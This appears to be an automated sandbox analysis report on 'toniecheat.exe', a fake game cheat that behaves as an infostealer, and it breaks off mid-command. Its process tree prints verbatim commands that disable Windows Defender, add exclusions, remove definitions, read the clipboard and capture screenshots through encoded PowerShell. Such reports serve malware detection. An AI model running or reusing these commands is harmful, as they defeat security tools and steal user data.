Analysis
-
max time kernel
150s -
max time network
149s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
25-11-2024 22:20
Behavioral task
behavioral1
Sample
toniecheat.exe
Resource
win10v2004-20241007-en
General
-
Target
toniecheat.exe
-
Size
24.4MB
-
MD5
d107cbeaef45f5cd7ddbb0d88e683aef
-
SHA1
db2a52cefd9414a14ef3b31b9bddb4b290de71f0
-
SHA256
b63155f617da18b3d56a178921a60cffb4cfb227142ed2f9989ce52655969d72
-
SHA512
cce1a2066ccb44ead1990506115760a501b516e4df6facd33eaf4fd9728fef9e8705f59da607fb0ffe10e987fda06c73d053649bb54a619c6fc7d1833938da8d
-
SSDEEP
786432:/TEGs1OEi/UMnspKXk8BEWL11JDjszSljW21:m1Ob8YXvJv1Yza
Malware Config
Signatures
-
Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepid Process 1380 powershell.exe 1452 powershell.exe 1248 powershell.exe 2672 powershell.exe 4052 powershell.exe -
Clipboard Data 1 TTPs 2 IoCs
Adversaries may collect data stored in the clipboard from users copying information within or between applications.
-
Executes dropped EXE 2 IoCs
Processes:
bound.exerar.exepid Process 2244 bound.exe 4420 rar.exe -
Loads dropped DLL 18 IoCs
Processes:
toniecheat.exebound.exepid Process 2820 toniecheat.exe 2820 toniecheat.exe 2820 toniecheat.exe 2820 toniecheat.exe 2820 toniecheat.exe 2820 toniecheat.exe 2820 toniecheat.exe 2820 toniecheat.exe 2820 toniecheat.exe 2820 toniecheat.exe 2820 toniecheat.exe 2820 toniecheat.exe 2820 toniecheat.exe 2820 toniecheat.exe 2820 toniecheat.exe 2820 toniecheat.exe 2820 toniecheat.exe 2244 bound.exe -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 23 ip-api.com -
Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
-
Enumerates processes with tasklist 1 TTPs 3 IoCs
Processes:
tasklist.exetasklist.exetasklist.exepid Process 2584 tasklist.exe 1536 tasklist.exe 4420 tasklist.exe -
Processes:
resource yara_rule behavioral1/files/0x0007000000023cd3-22.dat upx behavioral1/memory/2820-26-0x00007FFA6D9D0000-0x00007FFA6DFB9000-memory.dmp upx behavioral1/files/0x0007000000023cc4-28.dat upx behavioral1/files/0x0007000000023cd1-30.dat upx behavioral1/memory/2820-31-0x00007FFA70BB0000-0x00007FFA70BD3000-memory.dmp upx behavioral1/files/0x0007000000023ccb-50.dat upx behavioral1/files/0x0007000000023cca-49.dat upx behavioral1/files/0x0007000000023cc9-48.dat upx behavioral1/files/0x0007000000023cc8-47.dat upx behavioral1/files/0x0007000000023cc7-46.dat upx behavioral1/files/0x0007000000023cc6-45.dat upx behavioral1/files/0x0007000000023cc5-44.dat upx behavioral1/files/0x0007000000023cc3-43.dat upx behavioral1/files/0x0007000000023cd8-42.dat upx behavioral1/files/0x0007000000023cd7-41.dat upx behavioral1/files/0x0007000000023cd6-40.dat upx behavioral1/files/0x0007000000023cd2-37.dat upx behavioral1/files/0x0007000000023cd0-36.dat upx behavioral1/memory/2820-33-0x00007FFA77790000-0x00007FFA7779F000-memory.dmp upx behavioral1/memory/2820-56-0x00007FFA6F8E0000-0x00007FFA6F90D000-memory.dmp upx behavioral1/memory/2820-58-0x00007FFA75A10000-0x00007FFA75A29000-memory.dmp upx behavioral1/memory/2820-60-0x00007FFA6E850000-0x00007FFA6E873000-memory.dmp upx behavioral1/memory/2820-62-0x00007FFA5F290000-0x00007FFA5F407000-memory.dmp upx behavioral1/memory/2820-64-0x00007FFA73E60000-0x00007FFA73E79000-memory.dmp upx behavioral1/memory/2820-66-0x00007FFA76D40000-0x00007FFA76D4D000-memory.dmp upx behavioral1/memory/2820-68-0x00007FFA6E670000-0x00007FFA6E69E000-memory.dmp upx behavioral1/memory/2820-73-0x00007FFA6E160000-0x00007FFA6E218000-memory.dmp upx behavioral1/memory/2820-76-0x00007FFA70BB0000-0x00007FFA70BD3000-memory.dmp upx behavioral1/memory/2820-75-0x00007FFA5EF10000-0x00007FFA5F288000-memory.dmp upx behavioral1/memory/2820-72-0x00007FFA6D9D0000-0x00007FFA6DFB9000-memory.dmp upx behavioral1/memory/2820-78-0x00007FFA6E520000-0x00007FFA6E534000-memory.dmp upx behavioral1/memory/2820-80-0x00007FFA6FC00000-0x00007FFA6FC0D000-memory.dmp upx behavioral1/memory/2820-81-0x00007FFA75A10000-0x00007FFA75A29000-memory.dmp upx behavioral1/memory/2820-96-0x00007FFA6E850000-0x00007FFA6E873000-memory.dmp upx behavioral1/memory/2820-98-0x00007FFA57C50000-0x00007FFA57D6C000-memory.dmp upx behavioral1/memory/2820-121-0x00007FFA5F290000-0x00007FFA5F407000-memory.dmp upx behavioral1/memory/2820-130-0x00007FFA73E60000-0x00007FFA73E79000-memory.dmp upx behavioral1/memory/2820-216-0x00007FFA6E670000-0x00007FFA6E69E000-memory.dmp upx behavioral1/memory/2820-234-0x00007FFA6E160000-0x00007FFA6E218000-memory.dmp upx behavioral1/memory/2820-248-0x00007FFA5EF10000-0x00007FFA5F288000-memory.dmp upx behavioral1/memory/2820-255-0x00007FFA5F290000-0x00007FFA5F407000-memory.dmp upx behavioral1/memory/2820-264-0x00007FFA6E520000-0x00007FFA6E534000-memory.dmp upx behavioral1/memory/2820-249-0x00007FFA6D9D0000-0x00007FFA6DFB9000-memory.dmp upx behavioral1/memory/2820-250-0x00007FFA70BB0000-0x00007FFA70BD3000-memory.dmp upx behavioral1/memory/2820-285-0x00007FFA6D9D0000-0x00007FFA6DFB9000-memory.dmp upx behavioral1/memory/2820-311-0x00007FFA6E520000-0x00007FFA6E534000-memory.dmp upx behavioral1/memory/2820-310-0x00007FFA6E160000-0x00007FFA6E218000-memory.dmp upx behavioral1/memory/2820-309-0x00007FFA6E670000-0x00007FFA6E69E000-memory.dmp upx behavioral1/memory/2820-308-0x00007FFA76D40000-0x00007FFA76D4D000-memory.dmp upx behavioral1/memory/2820-307-0x00007FFA73E60000-0x00007FFA73E79000-memory.dmp upx behavioral1/memory/2820-306-0x00007FFA5F290000-0x00007FFA5F407000-memory.dmp upx behavioral1/memory/2820-305-0x00007FFA6E850000-0x00007FFA6E873000-memory.dmp upx behavioral1/memory/2820-304-0x00007FFA75A10000-0x00007FFA75A29000-memory.dmp upx behavioral1/memory/2820-303-0x00007FFA6F8E0000-0x00007FFA6F90D000-memory.dmp upx behavioral1/memory/2820-302-0x00007FFA77790000-0x00007FFA7779F000-memory.dmp upx behavioral1/memory/2820-301-0x00007FFA70BB0000-0x00007FFA70BD3000-memory.dmp upx behavioral1/memory/2820-300-0x00007FFA5EF10000-0x00007FFA5F288000-memory.dmp upx behavioral1/memory/2820-299-0x00007FFA57C50000-0x00007FFA57D6C000-memory.dmp upx behavioral1/memory/2820-298-0x00007FFA6FC00000-0x00007FFA6FC0D000-memory.dmp upx -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Detects videocard installed 1 TTPs 1 IoCs
Uses WMIC.exe to determine videocard installed.
-
Gathers system information 1 TTPs 1 IoCs
Runs systeminfo.exe.
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
powershell.exepowershell.exepowershell.exebound.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepid Process 1380 powershell.exe 1248 powershell.exe 1380 powershell.exe 1248 powershell.exe 1452 powershell.exe 1452 powershell.exe 1452 powershell.exe 2244 bound.exe 2244 bound.exe 4348 powershell.exe 4348 powershell.exe 3988 powershell.exe 3988 powershell.exe 4348 powershell.exe 3988 powershell.exe 2244 bound.exe 2244 bound.exe 2244 bound.exe 2244 bound.exe 2672 powershell.exe 2672 powershell.exe 2704 powershell.exe 2704 powershell.exe 2244 bound.exe 2244 bound.exe 2244 bound.exe 2244 bound.exe 2244 bound.exe 2244 bound.exe 4052 powershell.exe 4052 powershell.exe 1436 powershell.exe 1436 powershell.exe 2244 bound.exe 2244 bound.exe 2244 bound.exe 2244 bound.exe 2244 bound.exe 2244 bound.exe 2244 bound.exe 2244 bound.exe 2244 bound.exe 2244 bound.exe 2244 bound.exe 2244 bound.exe 2244 bound.exe 2244 bound.exe 2244 bound.exe 2244 bound.exe 2244 bound.exe 2244 bound.exe 2244 bound.exe 2244 bound.exe 2244 bound.exe 2244 bound.exe 2244 bound.exe 2244 bound.exe 2244 bound.exe 2244 bound.exe 2244 bound.exe 2244 bound.exe 2244 bound.exe 2244 bound.exe 2244 bound.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
powershell.exepowershell.exepowershell.exetasklist.exetasklist.exeWMIC.exepowershell.exetasklist.exepowershell.exepowershell.exepowershell.exeWMIC.exedescription pid Process Token: SeDebugPrivilege 1380 powershell.exe Token: SeDebugPrivilege 1248 powershell.exe Token: SeDebugPrivilege 1452 powershell.exe Token: SeDebugPrivilege 2584 tasklist.exe Token: SeDebugPrivilege 1536 tasklist.exe Token: SeIncreaseQuotaPrivilege 4284 WMIC.exe Token: SeSecurityPrivilege 4284 WMIC.exe Token: SeTakeOwnershipPrivilege 4284 WMIC.exe Token: SeLoadDriverPrivilege 4284 WMIC.exe Token: SeSystemProfilePrivilege 4284 WMIC.exe Token: SeSystemtimePrivilege 4284 WMIC.exe Token: SeProfSingleProcessPrivilege 4284 WMIC.exe Token: SeIncBasePriorityPrivilege 4284 WMIC.exe Token: SeCreatePagefilePrivilege 4284 WMIC.exe Token: SeBackupPrivilege 4284 WMIC.exe Token: SeRestorePrivilege 4284 WMIC.exe Token: SeShutdownPrivilege 4284 WMIC.exe Token: SeDebugPrivilege 4284 WMIC.exe Token: SeSystemEnvironmentPrivilege 4284 WMIC.exe Token: SeRemoteShutdownPrivilege 4284 WMIC.exe Token: SeUndockPrivilege 4284 WMIC.exe Token: SeManageVolumePrivilege 4284 WMIC.exe Token: 33 4284 WMIC.exe Token: 34 4284 WMIC.exe Token: 35 4284 WMIC.exe Token: 36 4284 WMIC.exe Token: SeDebugPrivilege 4348 powershell.exe Token: SeDebugPrivilege 4420 tasklist.exe Token: SeDebugPrivilege 3988 powershell.exe Token: SeIncreaseQuotaPrivilege 4284 WMIC.exe Token: SeSecurityPrivilege 4284 WMIC.exe Token: SeTakeOwnershipPrivilege 4284 WMIC.exe Token: SeLoadDriverPrivilege 4284 WMIC.exe Token: SeSystemProfilePrivilege 4284 WMIC.exe Token: SeSystemtimePrivilege 4284 WMIC.exe Token: SeProfSingleProcessPrivilege 4284 WMIC.exe Token: SeIncBasePriorityPrivilege 4284 WMIC.exe Token: SeCreatePagefilePrivilege 4284 WMIC.exe Token: SeBackupPrivilege 4284 WMIC.exe Token: SeRestorePrivilege 4284 WMIC.exe Token: SeShutdownPrivilege 4284 WMIC.exe Token: SeDebugPrivilege 4284 WMIC.exe Token: SeSystemEnvironmentPrivilege 4284 WMIC.exe Token: SeRemoteShutdownPrivilege 4284 WMIC.exe Token: SeUndockPrivilege 4284 WMIC.exe Token: SeManageVolumePrivilege 4284 WMIC.exe Token: 33 4284 WMIC.exe Token: 34 4284 WMIC.exe Token: 35 4284 WMIC.exe Token: 36 4284 WMIC.exe Token: SeDebugPrivilege 2672 powershell.exe Token: SeDebugPrivilege 2704 powershell.exe Token: SeIncreaseQuotaPrivilege 5008 WMIC.exe Token: SeSecurityPrivilege 5008 WMIC.exe Token: SeTakeOwnershipPrivilege 5008 WMIC.exe Token: SeLoadDriverPrivilege 5008 WMIC.exe Token: SeSystemProfilePrivilege 5008 WMIC.exe Token: SeSystemtimePrivilege 5008 WMIC.exe Token: SeProfSingleProcessPrivilege 5008 WMIC.exe Token: SeIncBasePriorityPrivilege 5008 WMIC.exe Token: SeCreatePagefilePrivilege 5008 WMIC.exe Token: SeBackupPrivilege 5008 WMIC.exe Token: SeRestorePrivilege 5008 WMIC.exe Token: SeShutdownPrivilege 5008 WMIC.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
toniecheat.exetoniecheat.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.exepowershell.execmd.exedescription pid Process procid_target PID 3880 wrote to memory of 2820 3880 toniecheat.exe 83 PID 3880 wrote to memory of 2820 3880 toniecheat.exe 83 PID 2820 wrote to memory of 2068 2820 toniecheat.exe 84 PID 2820 wrote to memory of 2068 2820 toniecheat.exe 84 PID 2820 wrote to memory of 2588 2820 toniecheat.exe 85 PID 2820 wrote to memory of 2588 2820 toniecheat.exe 85 PID 2068 wrote to memory of 1380 2068 cmd.exe 88 PID 2068 wrote to memory of 1380 2068 cmd.exe 88 PID 2588 wrote to memory of 1248 2588 cmd.exe 89 PID 2588 wrote to memory of 1248 2588 cmd.exe 89 PID 2820 wrote to memory of 4520 2820 toniecheat.exe 90 PID 2820 wrote to memory of 4520 2820 toniecheat.exe 90 PID 2820 wrote to memory of 3552 2820 toniecheat.exe 91 PID 2820 wrote to memory of 3552 2820 toniecheat.exe 91 PID 4520 wrote to memory of 1452 4520 cmd.exe 94 PID 4520 wrote to memory of 1452 4520 cmd.exe 94 PID 3552 wrote to memory of 2244 3552 cmd.exe 95 PID 3552 wrote to memory of 2244 3552 cmd.exe 95 PID 2820 wrote to memory of 5008 2820 toniecheat.exe 96 PID 2820 wrote to memory of 5008 2820 toniecheat.exe 96 PID 2820 wrote to memory of 3080 2820 toniecheat.exe 98 PID 2820 wrote to memory of 3080 2820 toniecheat.exe 98 PID 3080 wrote to memory of 2584 3080 cmd.exe 101 PID 3080 wrote to memory of 2584 3080 cmd.exe 101 PID 5008 wrote to memory of 1536 5008 cmd.exe 102 PID 5008 wrote to memory of 1536 5008 cmd.exe 102 PID 2820 wrote to memory of 360 2820 toniecheat.exe 104 PID 2820 wrote to memory of 360 2820 toniecheat.exe 104 PID 2820 wrote to memory of 4536 2820 toniecheat.exe 105 PID 2820 wrote to memory of 4536 2820 toniecheat.exe 105 PID 2820 wrote to memory of 4616 2820 toniecheat.exe 108 PID 2820 wrote to memory of 4616 2820 toniecheat.exe 108 PID 2820 wrote to memory of 3612 2820 toniecheat.exe 109 PID 2820 wrote to memory of 3612 2820 toniecheat.exe 109 PID 2820 wrote to memory of 5028 2820 toniecheat.exe 112 PID 2820 wrote to memory of 5028 2820 toniecheat.exe 112 PID 2820 wrote to memory of 2688 2820 toniecheat.exe 114 PID 2820 wrote to memory of 2688 2820 toniecheat.exe 114 PID 360 wrote to memory of 4284 360 cmd.exe 116 PID 360 wrote to memory of 4284 360 cmd.exe 116 PID 4536 wrote to memory of 4348 4536 cmd.exe 117 PID 4536 wrote to memory of 4348 4536 cmd.exe 117 PID 2688 wrote to memory of 3988 2688 cmd.exe 118 PID 2688 wrote to memory of 3988 2688 cmd.exe 118 PID 4616 wrote to memory of 4420 4616 cmd.exe 151 PID 4616 wrote to memory of 4420 4616 cmd.exe 151 PID 3612 wrote to memory of 4304 3612 cmd.exe 120 PID 3612 wrote to memory of 4304 3612 cmd.exe 120 PID 5028 wrote to memory of 1632 5028 cmd.exe 121 PID 5028 wrote to memory of 1632 5028 cmd.exe 121 PID 2820 wrote to memory of 3772 2820 toniecheat.exe 144 PID 2820 wrote to memory of 3772 2820 toniecheat.exe 144 PID 3772 wrote to memory of 3368 3772 cmd.exe 124 PID 3772 wrote to memory of 3368 3772 cmd.exe 124 PID 2820 wrote to memory of 3600 2820 toniecheat.exe 125 PID 2820 wrote to memory of 3600 2820 toniecheat.exe 125 PID 3600 wrote to memory of 2968 3600 cmd.exe 127 PID 3600 wrote to memory of 2968 3600 cmd.exe 127 PID 2820 wrote to memory of 5016 2820 toniecheat.exe 128 PID 2820 wrote to memory of 5016 2820 toniecheat.exe 128 PID 3988 wrote to memory of 212 3988 powershell.exe 129 PID 3988 wrote to memory of 212 3988 powershell.exe 129 PID 5016 wrote to memory of 1840 5016 cmd.exe 131 PID 5016 wrote to memory of 1840 5016 cmd.exe 131
Processes
-
C:\Users\Admin\AppData\Local\Temp\toniecheat.exe"C:\Users\Admin\AppData\Local\Temp\toniecheat.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:3880 -
C:\Users\Admin\AppData\Local\Temp\toniecheat.exe"C:\Users\Admin\AppData\Local\Temp\toniecheat.exe"2⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2820 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\toniecheat.exe'"3⤵
- Suspicious use of WriteProcessMemory
PID:2068 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\toniecheat.exe'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1380
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"3⤵
- Suspicious use of WriteProcessMemory
PID:2588 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1248
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\bound.exe'"3⤵
- Suspicious use of WriteProcessMemory
PID:4520 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\bound.exe'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1452
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "start bound.exe"3⤵
- Suspicious use of WriteProcessMemory
PID:3552 -
C:\Users\Admin\AppData\Local\Temp\bound.exebound.exe4⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
PID:2244
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵
- Suspicious use of WriteProcessMemory
PID:5008 -
C:\Windows\system32\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:1536
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵
- Suspicious use of WriteProcessMemory
PID:3080 -
C:\Windows\system32\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:2584
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"3⤵
- Suspicious use of WriteProcessMemory
PID:360 -
C:\Windows\System32\Wbem\WMIC.exeWMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName4⤵
- Suspicious use of AdjustPrivilegeToken
PID:4284
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"3⤵
- Clipboard Data
- Suspicious use of WriteProcessMemory
PID:4536 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard4⤵
- Clipboard Data
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4348
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵
- Suspicious use of WriteProcessMemory
PID:4616 -
C:\Windows\system32\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:4420
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"3⤵
- Suspicious use of WriteProcessMemory
PID:3612 -
C:\Windows\system32\tree.comtree /A /F4⤵PID:4304
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "systeminfo"3⤵
- Suspicious use of WriteProcessMemory
PID:5028 -
C:\Windows\system32\systeminfo.exesysteminfo4⤵
- Gathers system information
PID:1632
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="3⤵
- Suspicious use of WriteProcessMemory
PID:2688 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand 